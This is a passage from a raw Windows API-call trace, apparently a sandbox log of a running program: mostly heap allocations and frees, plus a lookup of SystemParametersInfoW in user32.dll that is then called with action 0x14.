hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0288.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9d0 [0288.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0288.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0288.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0288.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0288.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0288.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0288.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0288.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0288.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0288.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0288.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0288.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0288.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0288.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8c8 [0288.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0288.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0288.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0288.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0288.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0288.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0288.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0288.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0288.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0288.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0288.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0288.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0288.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0288.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0288.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8c8 [0288.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0288.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0288.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0288.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0288.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0288.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0288.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0288.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0288.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0288.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0288.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0288.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0288.206] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0288.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0288.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0288.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0288.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0288.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0288.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0288.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0288.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0288.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0288.207] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0288.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0288.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0288.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0288.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0288.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0288.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0288.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0288.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0288.207] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0288.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0288.207] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0288.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0288.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0288.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0288.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0288.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0288.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0288.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0288.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0288.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0288.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0288.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0288.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0288.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0288.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0288.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0288.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0288.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0288.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0288.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0288.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0288.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0288.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0288.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0288.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0288.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0288.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0288.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0288.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0288.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0288.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0288.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0288.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0288.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0288.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0288.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0288.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0288.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0288.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0288.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0288.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0288.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0288.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0288.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0288.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0288.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0288.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0288.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0288.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0288.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0288.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0288.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0288.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0288.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0288.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0288.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0288.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0288.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0288.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0288.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0288.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0288.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0288.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0288.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0288.211] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0288.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0288.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0288.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0288.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0288.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0288.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0288.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0288.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0288.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0288.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0288.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0288.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0288.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0288.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0288.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0288.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0288.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0288.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0288.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0288.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0288.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0288.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0288.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0288.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0288.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0288.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0288.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0288.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0288.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0288.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0288.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0288.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0288.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0288.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0288.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0288.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0288.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0288.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0288.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0288.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0288.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0288.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0288.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0288.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0288.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0288.213] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0288.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0288.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0288.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0288.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0288.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0288.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0288.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0288.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0288.214] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0288.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0288.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0288.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0288.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0288.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0288.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0288.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0288.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0288.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0288.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0288.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0288.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0288.215] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0288.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0288.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0288.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0288.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0288.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0288.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0288.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0288.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0288.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0288.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0288.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0288.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0288.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0288.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0288.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0288.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0288.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0288.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0288.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0288.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0288.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0288.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0288.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0288.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0288.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0288.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0288.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0288.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0288.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0288.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0288.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0288.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0288.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0288.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0288.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0288.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0288.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0288.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0288.347] FreeLibrary (hLibModule=0x74f40000) returned 1 [0288.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0288.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0288.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0288.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0288.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0288.348] HeapFree (in: hHeap=0x25c0000, 